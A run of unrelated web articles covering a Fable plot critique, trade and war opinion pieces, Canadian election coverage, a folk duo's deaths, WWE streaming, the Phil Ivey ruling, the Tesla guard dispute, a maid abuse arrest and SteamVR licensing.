Maze joins forces with JoB , because he 's afraid of JoB . Maze figures it is better to help JoB destroy the world than to resist him and… maybe… die ? Maze organizes the attack on your hometown . After slaughtering many people , he suddenly decided to disobey JoB . Now , if he killed you the prophecy would end and JoB 's plan would fail . If he hid you away JoB would never find you and thus his plan would fail . So Maze takes you to the Heroes Guild , where you will become a very famous badass . Despite his cowardice at standing up to JoB , Maze is brave enough to take you to be trained as a hero . This is a gutsy move , considering how he just got done destroying your hometown . Once you were a fully trained morally ambiguous badass , he started giving you information on how to rescue your sister . Once you rescued her , he then set about trying to re-capture her . Despite the fact that he saved your life and saw to it that you became the world 's foremost badass , he blabs his plan to you and then decides to kill you .
Once you kick his ass , with his dying breath he gives you an exceedingly long speech about how he did all of the above because he is “ a coward ” . ( And at this point I really hope you 're enjoying reading this because I am experiencing physical pain trying to put this into words without sustaining brain damage . )
Where was I ? Right . Next you go fight JoB . Actually , you have to run all over the gameworld while he teleports around . No matter how fast or slow you move , you 'll always arrive just in time to see him teleport away . ( Thankfully , you do n't surrender to him again . )
Eventually he goes to the Heroes Guild to claim the Uber Sword . He has both your mother and your sister . Just as you reach him , he kills your mother in front of you . Then you have a long-multi-stage boss fight with varying attack patterns until JoB becomes vulnerable and you kill him .
You sister then reveals that you have two choices :
Cast the sword into the abyss , destroying it forever . OR… Kill your sister , claiming the sword as your own . She presents this choice to you the same way she might suggest that you could have the chicken or the beef . She really does n't seem too invested in it one way or the other .
Note that even if you do take the sword you do not get the power to RULE AND / OR DESTROY THE WORLD as Jack was planning to do . You just get a sword with better stats than the one you have now . Note also that we 're at the end of the game and the utility of a better sword is somewhat questionable . It does n't occur to either of you that you could just walk away with the sword and NOT kill her with it .
So there it is . That 's the plot of the game , such as it is . I could tell you that the plot “ could have been better ” , but only if today was Enormous Understatement Day . ( I think that falls just after Halloween this year . )
This was probably the most infantile plot I 've run into in an RPG . Even the mindless shooters of yesteryear handled their stories with more finesse than this . Most of the plot hinged on Maze and his actions , and the guy made not one bit of sense . His service to Jack of Blades was irrational . Allowing for that , his betrayal was then irrational or at lest inexplicable . His help to you was irrational , and then working against you after helping you was irrational . And finally his trying to kill you after all of the above was sad and comical .
The storytelling was all over the place . It tried to incorporate heavy , serious subject matter – such as the prolonged torture and maiming of close family members . And yet the story itself had all the sophistication of Smurfs / Scooby-Doo crossover fan fiction . The plot was childish , so they tried to make it more “ adult ” by throwing in grim torture . The villain was about as deep and interesting as Skeletor , so they had the villain dedicate his life to being an absolute ass to you , in hopes that they could get you to care .
I know some people are going to object to me berating the game like this . This is very similar to my review of Transformers . Stop taking it so seriously ! It 's just supposed to be fun ! I suppose that works if all you want is action , but I ca n't help looking at this beautiful game and thinking how much better it would be if there was a worthwhile story to go with it .
This does n't mean the game sucks . I had fun with it . I enjoyed the combat . The scenery was pretty . I played through twice . But when the plot took center stage it was a painful thing to witness . This was a showcase of plot devices so lame they need hospice care . The dialog was so tired it could fall asleep in a mosh pit .
I really do n't think I 'm asking too much . This game could have had an interesting plot , and it would n't have cost them a dime . It did n't need to be longer , or have more voice acting , or more missions or scenery or music or spells or special effects . All they needed was to treat the story with the same respect and seriousness that they expected from the player .
Neo Atlas 1469 gameplay introduction trailer
First in-motion look at the PS Vita simulation game .
Artdink has released a gameplay introduction trailer for Neo Atlas 1469 introducing the simulation game 's main features .
Neo Atlas 1469 is set during the Age of Discovery , where no one yet knew the true ends of the world . Starting from Europe , which was the center for trade , players will create a map of the still unseen world . Players will listen to the reports of admirals who return from expeditions and create a map based on their reports . You 'll hear trustworthy things , as well as suspicious things such as monsters appearing . You 'll record on the map only what you believe , and the map will change .
Neo Atlas 1469 is due out for PS Vita in Japan on October 27 for 6,800 yen .
Watch the video below .
CNN , the nation 's Fake News leader , has reached an all-time low -- using a beloved children 's character to attack President Trump 's temporary travel ban .
Click here for a free subscription to Todd 's newsletter - a must-read for Conservatives !
The network produced a bizarre Facebook Live Chat that featured CNN reporter Clarissa Ward , Sherrie Westin from Sesame Street , International Rescue Committee 's David Miliband and Elmo - a hand puppet .
“ They like to play and learn just like Elmo and all his friends at Sesame Street , ” Elmo said during the interview . “ Elmo thinks it 's important to know that everybody is the same deep down and that 's very important . ”
CNN reported that Elmo visited a Syrian refugee camp - calling the trip `` really wonderful . ''
To continue reading Todd 's column from ToddStarnes.com , click here .
Protectionism is bad even for the protectionist economy 0 SHARES Share it ! Share Tweet
By Valentin A. Araneta
The world economic community is now greatly concerned with the “ America first ” policy of the Trump administration which has protectionist implications . Protectionist policies imply tariff and non-tariff barriers designed to make the importation of goods and services so expensive so that these will instead be produced in the United States and thus employ more people in the domestic production of such goods . The result would be that the industries and employment of the countries exporting to the US would be adversely affected . However in a global economy where production and trade structures are heavily interlinked , the country that initiates protectionist policies could end up suffering as much if not more as the rest of its trading partners in the long run . This is because protectionist policies of a country tend to push up its production and labor costs and therefore its products become less competitive . A big proportion of the goods and services produced in the US are sourced from abroad because they can be produced more cheaply there . If the Trump America first policy insists that these goods and services be produced only in the US , the costs of production in the US will grow substantially . The ironic result of Trump 's protectionist policies could be that the rest of the world realigns trade agreements and structures over time and the balance of trade deficit of the US that Trump says he wants to correct could end up actually worse than before . The balance of trade deficit that he has been complaining about is actually self-adjusting in the capital accounts and that is why the US dollar has been considered strong in spite of the chronic trade deficit of the US .
Trump may think that he is talking from a position of strength because of the size of the US market . In the table below , we can see that the US accounted for over 24 percent of the world 's GDP in 2015 . However this means that the rest of the world accounted for the balance of over 75 percent of the world 's GDP . Actually , the respective share of the world 's GDP of the trading blocs composed of the European Union and BRICs ( Brazil , Russia , India , China , and South Africa ) approximate that of the US . What is actually even more remarkable is that the ratio of the exports of goods and services to GDP of the trading blocs is much higher than the United States . If the America first policy of Trump causes further realignments of trading blocs , increasingly higher ratios of trade to GDP of the rest of the world could be the result and with the US ending up in in a diminishing role in world trade . Take for instance the combined ratio of exports of goods and services of Canada and Mexico who are the two other members of the North American Free Trade Association ( NAFTA ) aside from the US This ratio is 33.2 percent , almost three times that of the ratio of the US .
2016 marked the first time in 15 years that the growth in world trade grew more slowly than the growth in world GDP and this was even before the Trump administration took over the reins of the US government . For 2017 , world trade is expected to grow more slowly than the growth in world GDP again . This can not be allowed to be the trend because it is world trade through the implementation and transfer of technological and organizational innovationsthat leads world economic growth and progress . For this reason , trading and multilateral organizations are placing great emphasis on the need to sustain trade liberalization and cooperation among all countries . It is also important for countries contemplating protectionist policies to realize that protectionism is not good for their economies in the long run .
* * * *
The opinions expressed here are the views of the writer and do not necessarily reflect the views and opinions of FINEX . You may email Mr.Araneta at vaaraneta @ yahoo.com
Tags : economic community , manila bulletin , mb.com.ph , policy , Protectionism is bad even for the protectionist economy , Trump Administration , Valentin A. Araneta
By Rachel Blevins
On October 7th 16 years ago , less than one month after 9/11 , President George W. Bush delivered a televised address from the White House announcing the beginning of the Afghanistan War .
“ On my orders , the United States military has begun strikes against al Qaeda terrorist training camps and military installations of the Taliban regime in Afghanistan , ” he said .
What Bush did not say was the fact that the War in Afghanistan would become the longest war in United States history . Thousands of American lives and billions of taxpayer dollars would be wasted at the expense of the U.S. war machine , and the “ War on Terrorism ” would only create more terrorism as a result .
Over 31,000 civilian deaths have been documented in Afghanistan following the U.S. invasion . It should be noted that over the last few years , civilian deaths have substantially increased—which serves as a reminder that the situation is only getting worse .
The United Nations Assistance Mission in Afghanistan began documenting civilian casualties in 2009 . The combined number of civilians who were killed and injured that year was nearly 6,000 . The number has steadily increased over the years , and in 2016 , it reached a record high with nearly 3,500 killed and nearly 8,000 injured .
A report from the UNAMA noted that in 2017 , the death rate for children has increased by 9 percent over the previous year , and the death rate for women has increased by 23 percent . The report also claimed that an increase in airstrikes has led to a 43 percent increase in causalities .
Before the United States invaded Afghanistan , the production of opium poppies was significantly low , thanks to the Taliban . Not only did the presence of the U.S. military lead to a rise in opium production—because U.S. Marines were literally guarding fields of poppy plants—it led to a drastic increase that has done wonders for the illegal drug trade .
According to a report from the UN Office on Drugs and Crime , between 2015 and 2016 , opium production in Afghanistan increased by 43 percent , and the area used to farm the poppy plant increased by 10 percent to 201,000 hectares . In response to the report , UNODC Executive Director Yury Fedotov said the figures were “ a worrying reversal in efforts . ”
After 16 years of war and a price tag of over $ 1 Trillion , the United States has not only helped Afghanistan to become the largest producer of opium in world , it has ensured that the war-ravaged country produces around 90 percent of the world 's opium supply .
Survival Solar Battery Charger - Free Today ! When former President Obama ran for office in the 2008 election , he campaigned on the promise of ending the Afghanistan War—which resonated with a number of Americans who were hopeful that a fresh face in the oval office would bring about the “ change ” needed to finally end the war . However , while Obama promised to end the war and increased it instead , President Trump has been much more blunt about the fact that the war in Afghanistan is not coming to an end anytime soon , and while the U.S. may have a strategy in mind , it does not appear to include an “ exit. ” The longest War in United States history turns 16 years old today , and in just two years , brand-new military recruits will have the opportunity to fight in a war that has been ongoing for as long as they have been alive . While there are many Americans who support the concept of military intervention—including in countries that have done nothing to the U.S.—even they should be asking the question of why the United States continues to fight a war that has only created an increase in terrorism , innocent civilian deaths and illegal drug production . Rachel Blevins is a Texas-based journalist who aspires to break the left/right paradigm in media and politics by pursuing truth and questioning existing narratives . Follow Rachel on Facebook , Twitter and YouTube . This article first appeared at The Free Thought Project .
For weeks there have been rumblings of a major restaurant shake-up in downtown Cleveland . It finally can be revealed what that news is all about .
Chris Hodgson , owner of Dim and Den Sum and Hodge Podge food trucks , has paired up with Scott Kuhn , owner of Washington Place Bistro and Welshfield Inn , to open a new restaurant in the current home of Zinc Bistro . Zinc will close its doors on December 23 .
It 's been a rocky road for Zinc , a French-style bistro that opened in spring of 2010 . Ambitious original plans included an all-day retail bakery offering salads , sandwiches and house-made pastries . That never transpired . And while multiple chef and management changes attempted to right the ship , that apparently did not happen .
Zinc Bistro is located on Euclid Avenue , on the ground floor of the $ 65 million Residences at Six Six Eight development .
Hodgson and Kuhn are still in the planning phases of their restaurant . More on the details of the new project as they unfold .
Of the posts I 've written so far , this one has the most potential to impact a typical workflow for students , or anyone that produces line drawings using Rhino and Illustrator . This plugin has drastically changed my own workflow .
Doodlebug was created by Andrew Heumann , the same person that makes a few other extremely helpful plugins for Grasshopper ( I gave an example of Human in action when I posted the `` Carve '' component a few weeks ago ) .
Doodlebug is a plugin for Grasshopper ( available on www.grasshopper3d.com here , but be sure to instead download from here if you have Illustrator CC 2017 ) that acts as a live link between Rhino and Illustrator . Rather than exporting linework from Rhino into and Illustrator file and touching up the linework from there , the plugin will shoot geometry over into Illustrator in real time while you work in Rhino . The Grasshopper components allow the user to change line weight , line color , and fill—all without ever exporting an .ai file from Rhino , or touching the options in Illustrator . You can set the file up to use layers in both Rhino and Illustrator , and there 's even a scaling component so you can draw full scale in Rhino and have your Illustrator file reflect a scaled version .
DULL trading persisted in the local currency market for the third consecutive week .
The rupee traded slightly depressed against the dollar on the interbank market as a result of fresh surge in dollar demand .
In the open market , however , the rupee remained firm against the dollar . The parity traded flat for the third successive week due to easy dollar supply .
On the interbank market , the rupee traded at Rs104.86 and Rs104.87 , unchanged from the prior week 's close
On the interbank market last week , the rupee commenced the week on a stable note against the dollar in the first trading session and traded at Rs104.86 and Rs104.87 , unchanged from the prior week 's close .
In the second session , however , the parity showed minor fluctuation as the dollar managed to gain slight strength against the rupee on fresh surge in dollar demand by importers and corporate sector .
The rupee shed one paisa against the dollar during the session , pushing the dollar to Rs104.87 and Rs104.88 .
In the third session , the parity did not show any change amid flat dollar demand from the importers due to lacklustre trading activity . The rupee remained range-bound , trading flat at Rs104.87 and Rs104.88 .
In the fourth session , the parity traded flat at Rs104.87 and Rs104.88 .
In the last session , the parity remained unchanged as the rupee closed flat at Rs104.87 and Rs104.88 .
During the week , the dollar on the interbank market managed to appreciate by one paisa against the rupee on a WoW basis . Against the dollar , the rupee posted loss in one session but remained unchanged in four sessions .
Chart by RA
In the open market , the rupee stayed firm against the dollar due to adequate foreign inflows . The rupee did not move any side against the dollar for the third consecutive week . The parity commenced the week at Rs105.90 and Rs106.10 , unchanged from the previous week 's close .
In the last session , the parity remained unchanged and the rupee closed the week flat against the dollar at Rs105.90 and Rs106.10 for the fifth straight day on the back of low demand .
Against euro , the rupee commenced by posting a 30 paisas loss in the first session that lifted euro to the week 's highest levels at Rs118.60 and Rs119.60 . In the second session , the rupee , however , managed a partial recovery , posting a 10 paisas gain at Rs118.50 and Rs119.50 .
In the third session , the rupee gained 25 paisas on the buying counter .
The euro downslide continued for the third day as the rupee in the fourth session picked up 25 paisas on the buying counter and another 50 paisas on the selling counter , dragging the euro to fresh lows at Rs118 and Rs119 in June .
During the week , rupee gained 30 paisas against the euro on a WoW basis as the rupee managed to gain 60 paisas in four sessions while losing 30 paisas in one session .
Published in Dawn , The Business and Finance Weekly , June 19th , 2017
What is the future for US relations with the Arab world and beyond ?
For generations the Middle East has served as a setting for the grand narratives of American imperial power . US presidents have had a long-standing and complex relationship with Arab leaders , often playing puppet-master to the proxies and despots they put in power to look out for US interests .
The Arab Spring ushered in the debut performance of a new player : The Arab people themselves . And they are loud , clear , and unabashed about their desire to take the front seat in the policies and procedures of their region .
`` I do n't think the Arab Spring is the greatest thing for American interests . '' - Robert Kaplan , the national correspondent for The Atlantic
From attacked embassies to unwinnable wars , the Arab world is quickly and deftly slipping out of US control and the power the US has enjoyed in the Middle East may finally be reaching an end .
As the Arab people begin to proactively tell their leaders and the world what they want , the question now becomes how the US , so accustomed to directing the region as it pleases , will deal with its diminishing power .
Rhetorically , Barack Obama embraced the Arab Spring , but is he just the latest US president to dream of a new Middle East ?
Empire asks : Will the US continue to try to dictate its own agenda with hard power ? Or will it 'lead from behind ' , accepting a more multilateral role working with the Arab people and their leaders ?
Joining us as interviewees : Anne-Marie Slaughter , a Princeton professor and former director of policy planning for the US State Department ; Robert Kaplan , the national correspondent for The Atlantic magazine ; Francis Fukuyama , a political scientist and author of nine books including The End of History and the Last Man ; and Pankaj Mishra , a noted essayist and novelist .
We debate the larger issues of US relations with the Arab world and beyond with our guests : Steven Clemons , the Washington editor-at-large of The Atlantic ; Marwan Muasher , the vice president of studies at the Carnegie Endowment for International Peace and author of The Arab Center : The Promise of Moderation ; John Esposito , a professor of international affairs and Islamic studies at Georgetown University and the author of over 30 books , including Islamophobia : The Challenges of Pluralism in the 21st Century ; and Patrick Tyler , a journalist and the author of A World of Trouble : The White House in the Middle East .
Source : Al Jazeera
Stephen Harper defended himself against attacks on his economic record Canadian political leaders have accused Prime Minister Stephen Harper of not having a plan to deal with effects of US financial crisis on the economy . The five leaders were taking part in the second of two TV debates ahead of a general election on 14 October . Opposition leaders said Mr Harper was keeping voters in the dark by failing to come up with an economic plan . However , the Conservative leader played down fears , saying Canada was on a better economic footing than the US . During the debate , Mr Harper also said for the first time that he had been wrong to support the US invasion of Iraq while leader of the opposition . Polls have consistently given Mr Harper a 10 percentage point lead over his nearest rival , Stephane Dion of the Liberal Party . What crisis ? The longest part of the debate focused on the economy . `` We are not in the kind of economic crisis we have in the US , '' Mr Harper said . Where 's your platform ? Yours is the only party that has n't put forward any platform in this election
Elizabeth May
Green Party `` Overall , we 're being successful . We 're keeping the economy on course and we 're not going into recession , '' he said . `` What Canadians are worried about ... is they see the stock market problems , '' he said . However , the head of the leftist New Democratic Party ( NDP ) , Jack Layton , challenged Mr Harper 's position , saying : `` The economy is not fine . '' `` Either you do n't care or you 're incompetent , which is it ? '' he asked . Mr Dion shot back that Mr Harper had `` no idea what to do '' about the crisis . Bloc Quebecois leader Gilles Duceppe likened Mr Harper 's approach to the economy to the laissez-faire policies of the Bush administration . `` It 's like 'do n't worry , be happy ' , '' he said . Elizabeth May , the first Green Party leader to participate in the leaders ' debate , called on Mr Harper to release an economic plan . `` You offered nothing up and again tonight you 've spent your time attacking the policies of others . Where 's your platform ? Yours is the only party that has n't put forward any platform in this election , '' she said . Green tax Mr Harper turned on Mr Dion , accusing him of panicking under pressure by unveiling an economic plan during the previous night 's debate in French . During Wednesday 's debate , which also focused heavily on the economy , Mr Dion promised to consult financial regulators and provincial governments within 30 days of winning the election to develop measures to stimulate the economy . It 's obviously clear the evaluation of weapons of mass destruction proved not to be correct
Stephen Harper
Prime Minister For the first time in the campaign , Mr Layton turned on Mr Dion - in some parts of the country , the NDP has supplanted the Liberals as the most serious challenger to the Conservatives . Mr Layton criticised Mr Dion for backing Mr Harper in confidence motions in parliament . `` If you ca n't do your job as leader of the opposition , I do n't know what you 're doing running for prime minister , '' he said . Mr Layton joined Mr Harper in attacking the Liberals ' Green Shift plan , which would pair income-tax cuts with a new tax on greenhouse gas emissions , saying it did not `` add up '' . Plagiarism claim On Iraq , Mr Harper said the invasion `` was absolutely an error '' , reversing his past support for the US-led war . `` It 's obviously clear the evaluation of weapons of mass destruction proved not to be correct , '' he said . A senior staffer in the Conservative Party resigned on Tuesday after admitting he plagiarised parts of a speech by Australia 's then PM John Howard , urging support for the war . Mr Harper 's Conservatives were elected in 2006 but without a majority . His move to call a snap poll is seen as a bid to capitalise on favourable opinion polls and win an overall majority in parliament this time round , correspondents say .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon What are these ?
Nowhere Man and a Whiskey Girl was the name Derrick and Amy Ross of Bisbee , Arizona performed folk music under . Married for 13 years and by all accounts still deeply in love , Amy played keyboard and sang while Derrick played guitar . They developed a strong following in the Southwest .
Here 's how the duo 's website describes how the name was derived :
When Derrick and Amy Ross began performing as Nowhere Man and a Whiskey Girl in early 2003 , their intentions were simple enough : Select a name that hinted at their roots in the American West and established their identity as a determinedly two-person operation . The name also cast them as a couple of wanderers , too intoxicated with the possibilities of someplace else to settle down . In that sense , the name would prove prophetic as it charted the course of the next five years of their lives . Unable to locate a satisfactory permanent home , they accumulated more than their fair share of temporary addresses . When it wasnt the pony-trail towns of Bisbee , Tucson , and Willcox in the Arizona Territory , it was cooler locales like Corvallis and Nashville . Upon the release of their debut album , they hit the road for weeks at a time , bypassing the metropolitan centers in favor of the oft-neglected smaller towns in between . Wherever they went , they brought a simple musical proposition : Her piano and voice , his acoustic guitar , a love of lifes little details , and a sense of humor . Although they traversed a landscape of bleached-husk desolation , they arrived none the worse for wear . Their longing for home unfulfilled , they found something of greater value along the way . They found a legion of like-minded hopeful searchers who believed in what they had to say and how they said it…
On Monday , Nowhere Man and Whiskey Girl ceased to be . Amy died from a blood infection — the result of on-going dialysis she had to undergo because of a battle with lupus — and Derrick took his own life later that night . She was 40 , he was 39 .
According to comedian Doug Stanhope , a friend of the couple who rented his home to them , Derrick — who was a guest on Stanhope 's podcast just a few days ago — was insistent that he was n't in a bad place after Amy 's passing .
“ After ( Amy ) died , he kept telling people he was OK , ” Stanhope told the Arizona Daily Star . “ Evidently he bought a gun on the way home from the hospital . We found a receipt . ”
Amy announced her death in her own words on her personal Facebook page…
According to the Tucson Sentinel , Stanhope wrote the message from Amy after Derrick gave him her Facebook password . Later , after Derrick committed suicide , Stanhope posted another message to Amy 's Facebook page .
In an interview with Tucson Weekly , Stanhope talked about the type of people his friends Amy and Derrick were .
My girlfriend [ Amy “ Bingo ” Bingaman ] wanted to go see The Wall for her birthday and I did n't want to go . . . but instead I had Whiskey Girl and Nowhere Man [ perform it ] . They learned the entire f * cking thing and did it at our house for a surprise party . They had a full band , even the bullhorn parts . [ Laughs ] They learned the entire album just for her birthday . Just f * cking amazing .
In their song “ If Only I , ” Amy talks about the type of legacy she 'd like to leave behind after she 's gone and the video for the song features the couple dancing lovingly together .
It 's probably debatable whether two people have ever loved each other more . If life was fair , Amy and Derrick would have had the chance to grow old together . May they rest in peace .
( Pics via Nowhere Man & Whiskey Girl and Facebook )
Professional Wrestling Just Bodyslammed Their PPV Business Model
from the mind-equals-blown dept
World Wrestling Entertainment , Inc. , or the WWE , has previously not been known as the kind of company that is forward-looking in their business model efforts . The purveyors of professional wrestling made many lists of companies in support of SOPA and CISPA , while CEO and frontman Vince McMahon has , in the past , been quite lawsuit-happy when it comes to even the most modest relation to company trademarks . All this was done as the company dragged its feet more doggedly than any other sports entertainment company in holding onto their now-iconic pay-per-view business model . Even as they signed more and more network and cable television deals , those broadcasts all seemed to be chiefly used to push fans towards live events and the big events broadcasted solely on PPV .
And now , with a suddeness that is a little breathtaking , the WWE is leaping into the modern era with both feet in a way that far surpasses their more legitimate sporting brethren .
Starting on February 24 , wrestling fans are going to be able to sign up for the WWE Network , an online 24/7 channel that will stream all of the company 's 12 monthly pay-per-views , including Wrestlemania , and offer all of those , some original programing , `` years '' of old Raw and Smackdown episodes and ... every single PPV show from WWF/E , WCW and ECW history . And NXT and Superstars . And live pre- and post-shows for Raw and Smackdown . All of that for just $ 10 a month , with a six month commitment . That puts the initial bill at $ 60 .
WWE will still offer their 12 big shows through PPV , if people are interested , but the forecast here is pretty clear : PPV is the fool 's option going forward . WWE does still broadcast its two big weekly shows , Raw and Smackdown , on cable . It will continue to for the foreseeable future . But everything else ? It 's online now and it 's just made the gaming consoles and handheld devices of wrestling fanatics like myself much more likely to be the main portals through which we get our fix . Screw the cable box .
That math is extreme , to say the least . Comparisons to what thewas asking their fans to pay in the PPV model were far more expensive , without even the most modest offering online in comparison . For them to now offer streaming of everything at that kind of price represents a huge departure that simply has no equal amongst professional sports . I 'm not much of a professional wrestling fan , but I 'm rooting for this to work wildly enough to grab the attention of the NHL , NBA , NFL and MLB , who offer online streaming services , but with more restrictions and price barriers than I care to recall.So , why are they doing this ? Well , likely the biggest reason is that the company can see the writing on the wall when it comes to how people today expect to get their entertainment.That reference to gaming consoles ? Yeah , thehas worked out deals with Sony and Microsoft to offer this streaming service throgh the last and new generation of consoles . Which is probably the other reason they 're doing this : they 're grabbing up new , younger customers with a streaming service that will bring in regular , predictable revenue . Rather than having fans that might save up to buy one or two PPV events a year , they 're giving them everything at a cost that 's reduced but repeated . It 's a tradeoff that benefits their fans and themselves as a matter of scale and predictability . If it takes off , it 's going to be a huge win all around.In other words , despite its history , theappears to be trying to give their fans what they want , how they want it , at a price they 're likely to be willing to pay . Considering that their events have been illegally streamed for some time now , often at a lesser quality than a legitimate stream will offer , this is competing with free on a level other professional sports ( other than , perhaps , the NCAA basketball tournement ) have n't even . For sports fans , you should be hoping this succeeds in a big way .
Filed Under : business models , internet streaming , wrestling
Companies : wwe
It turns out , Phil Ivey was dealt the losing hand .
According to iTV News , Ivey was ruled against by a High Court judge in his case against the Crockfords Club Casino in his bid to retrieve £7.7m in “ winnings ” he accumulated through the use of “ edge sorting . ”
Ivey argued that “ edge sorting ” was a technique he used to gain his edge on the house while Crockfords argued that by doing so he “ defeated the premise of the game and therefore meant there was no contract between Ivey and the casino . ”
The court declared that Ivey could not lay claim to these won funds and a “ pleased ” Crockfords issued the following statement :
“ We attach the greatest importance to our exemplary reputation for fair , honest and professional conduct and today 's ruling vindicates the steps we have taken in this matter . ”
Through a spokesman , Phil Ivey has also issued the following statements :
“ I am obviously disappointed with this judge 's decision . As I said in court , it is not my nature to cheat and I would never do anything to risk my reputation . ”
“ I am pleased that the judge acknowledged in court that I was a truthful witness by saying that ‘ I am entirely convinced that Mr Ivey did not consider that what he was doing was cheating . ”
Ivey continued “ I believe that what we did was a legitimate strategy – we did nothing more than exploit Crockfords ' failures to take proper steps to protect themselves against a player of my ability – clearly today , the judge did not agree . ”
Additionally , it looks as if Ivey was denied the ability to appeal , but they “ can renew their application to the Court of Appeal directly . ”
More on this story as it develops .
Read more from pokerfuse Crockfords Casino Stalls on Phil Ivey £7m Casino Win
Security guards at Tesla 's Gigafactory have been accused of violently confronting two journalists from the Reno Gazette-Journal . Earlier this month , Tesla said two reporters from the publication illegally trespassed on the company 's property and reversed their car into an employee , but the RGJ is now disputing the company 's characterization of events . `` This portrayal is scandalous and could not be further from the truth , '' wrote RGJ lawyer Scott Glogovac in a letter sent to Tesla and reported by the RGJ itself .
Glogovac claims that the RGJ 's reporters , Jason Hidalgo and photographer Andy Barron , had parked the newspaper 's Jeep in a `` publicly accessible '' area overlooking Tesla 's factory before getting out of the car to take photos . He says they were then confronted by security guards who demanded Barron 's camera and followed the pair back to their Jeep . The guards then allegedly rammed the car with an ATV and forced it to a stop , before one guard jumped on the hood of the car and another smashed the driver 's side window with a large rock .
Barron was reportedly taunted by one guard and pushed `` face-first in the dirt ''
One of the guards is reported to have `` displayed '' a knife to the pair before reaching through the broken window and severing the seatbelt `` near the head of the RGJ driver . '' Glogovac says that Barron was then dragged out of the car and pushed `` face-first in the dirt with a knee or foot in his back , '' while the guard taunted him , saying : `` Now who 's the tough guy ? ''
`` If the hard hat wearing individuals were , as Tesla has represented , Tesla security guards , those individuals were the lawless renegades , not the RGJ staffers , '' writes Glogovac . `` Tesla has already ( claimed ) that the RGJ employees trespassed on Tesla property , but even if they trespassed , that did n't give Tesla the right to attempt to detain or apprehend the employees in the manner it did : smashing a window , brandishing a knife , physically manhandling the photographer . ''
In the RGJ 's report of Glogovac 's letter , he does not deny that the pair might have been trespassing on private property . Tesla previously stated that the two journalists `` climbed through a fence designated with ‘ private property ' signs , '' with the area 's Sheriff , Gerald Antinoro , reiterating this statement . The focus of the dispute seems to instead be over the conduct of the journalists and of the guards . Both sides say they were left with scrapes , cuts , and abrasions after the incident .
Tesla says it `` will not stand for assaults on employees ''
An anonymous Telsa spokesperson told the RGJ that the company was disappointed with Glogovac 's letter . `` The letter seems designed to condone repeated trespassing and attack victims for seeking to stop the attack on them , '' wrote the spokesperson . `` We will not stand for assaults on our employees and are working with law enforcement to investigate this incident and ensure that those responsible are brought to justice . ''
The RGJ reports that Barron was originally booked by local police on two felony charges , but no criminal complaint against him has been filed as of Monday afternoon this week . An arraignment hearing is currently scheduled for November 18th .
When rebooting a franchise , the developers ca n't help but look outside the original games for inspiration . While the team at Eidos Montreal is confident that they understand why the older Thief games are held in such high regard and are bringing those elements to the new game , the long production cycle for this game has given them plenty of time to comb through other media . From excellent stealth games like Mark of the Ninja to atmospheric titles like The Room on iOS , the team cited a wide range of influences .
Watch the video below to hear Thief 's director Nicolas Cantin and producer Stephane Roy explain who the new game is for and how games like Assassin 's Creed , Bioshock , and Dishonored have helped shape it along the way .
Click the banner below to go to our Thief hub , where you 'll find additional exclusive content throughout the month .
Police have arrested a husband and wife who have allegedly abused their 60-year-old Indonesian maid at their home in Skudai . — Reuters
JOHOR BARU , Dec 17 — Police have arrested a husband and wife who have allegedly abused their 60-year-old Indonesian maid at their home in Skudai .
The arrest came following a report lodged by the Indonesian Consulate-General here recently .
The couple , a 48-year-old female doctor and her 50-year-old bus driver husband , have allegedly exploited and abused their undocumented Indonesian maid for the past eight years .
The victim , who hails from Java , has diabetes and is suffering from an infection on her left leg . She was believed to have started working with the suspects since 2009 .
Sources familiar with the ongoing case said the victim was rescued by the police from her employer 's double-storey terrace house in Taman Sri Putri , Skudai here on December 4 following information provided by the Indonesian Consulate-General in Johor Baru .
“ The victim was sent for medical observation and is reported to be stable . She is currently receiving medical treatment for her leg wound and diabetes at the Sultanah Aminah Hospital with 24-hour police protection , ” sources said to Malay Mail today .
It was learnt that in the few days after the rescue , police searched the suspects ' house and verified the victim 's claims from the Indonesian Consulate-General 's information based on a letter from a resident in the victim 's neighbourhood .
Following that , a formal police report on the alleged abuse was lodged by an Indonesian Consulate-General staff at the Skudai police station on Thursday .
Sources said investigators from the Johor Baru North Criminal Investigations Department ( CID ) then arrested the husband on the same day at their family house in Taman Sri Putri , followed by the arrest of the wife at the Johor Baru North district police headquarters last night .
“ Initial investigations revealed that the case involved a complex arrangement by the couple and their maid , where the latter was believed to have been constantly abused physically and verbally , at times not given food , forced to take care of the household chores and the care of two dogs . ”
Sources also revealed that the victim , who has no valid work permit or a passport , has also not seen any of the RM500 per month money owed to her as wages that was apparently said to have been banked into a bank account .
“ She had no one to turn to for help except for the neighbour who secretly assisted with her clothing , undergarments and other basic needs , ” said the sources , adding that the alleged physical and verbal abuse mainly came from the female suspect who works as a doctor in a polyclinic in Pasir Gudang .
Besides the abuse , sources described the case as having elements of contemporary slavery in the form of indentured labour and domestic servitude where the victim was not paid any wages nor had any kind of welfare provided .
“ From investigations , the suspects ' were alleged to have denied basic needs and also healthcare to the victim , who is a senior citizen suffering from diabetes , ” revealed the sources .
Investigators are probing the case further and will call in witnesses for statements , while police have also applied for an Interim Protection Order ( IPO ) from the Johor Baru courts . There has been no seizure of items by police yet .
The case has been classified under Section 12 of the Anti-Trafficking in Persons and Smuggling of Migrants ( ATIPSOM ) Act 2007 for human trafficking and also Section 39 ( b ) of the Immigration Act 1963 for hiring foreign workers without a permit .
Close
Similar to the open source Steam controller , Valve , along with partner HTC , is opening up the room-scale 3D tracking system of the Vive VR headset , which is a move that further brightens the future of the burgeoning virtual reality industry .
Under the SteamVR Tracking license , third-party companies will be able to purchase the sensors used on the Vive VR headset and its controllers to be attached to products and accessories that they will make . The third-party devices will then be capable of being identified by the Vive VR system 's tracking technology .
The tracking system of the Vive VR , which was developed by Valve and built by HTC , is different from the camera systems used by rival virtual reality headsets Oculus Rift and PlayStation VR . The system uses a pair of base station that emits lasers , which hit the Vive VR headset 's sensors . The SteamVR software then uses the data to triangulate the location of the headset and its wearer .
According to the FAQ that Valve has uploaded , no licensing fees will be charged for companies looking to use the Vive VR system 's tracking technology , as the goal is to have the technology proliferate as widely as it could . With more devices compatible with SteamVR , the community will become more valuable for both developers and customers , pushing the platform onward to more innovations where third-party companies can contribute .
While it sounds too good to be true , Valve assures that there is no catch in its decision to open source the tracking technology . It will not be collecting any fees or royalties , but it will require interested companies and developers to have at least one member of their teams attend an in-person introductory class that will cost about $ 3,000 per person . The classes will start in September , and will be conducted by Valve and Synapse in the United States and by HTC in Asia .
